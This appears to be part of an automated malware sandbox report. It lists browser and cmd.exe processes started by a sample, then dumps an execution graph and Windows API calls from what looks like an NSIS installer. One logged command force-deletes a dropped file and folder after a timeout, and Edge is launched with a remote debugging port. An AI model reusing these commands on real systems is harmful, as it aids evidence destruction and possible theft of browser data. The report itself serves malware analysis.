                                                                                                                                                                                                                                                                                          Start time:03:45:38
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2432,i,10762324331143125605,3752248268113785829,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                                                          Start time:03:45:51
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                                                          Start time:03:45:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2508,i,6938199240973265480,1311617046375224324,262144 /prefetch:3
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                                                          Start time:03:45:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                                                                          Start time:03:45:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:3
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                                                                          Start time:03:45:56
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6048 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                                                          Start time:03:45:56
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6540 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                                                                          Start time:03:46:25
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit
                                                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                                                                          Start time:03:46:25
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                                                                          Start time:03:46:26
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                          Imagebase:0x2a0000
                                                                                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                                                                          Start time:03:46:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1092 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

Execution Graph

Execution Coverage:17.5%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21%
Total number of Nodes:1482
Total number of Limit Nodes:25
3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 
405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 
4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 
3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 
CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 
4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 
406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 
4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

Control-flow Graph

[Control-flow graph figure omitted; legend: Executed / Not Executed]
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
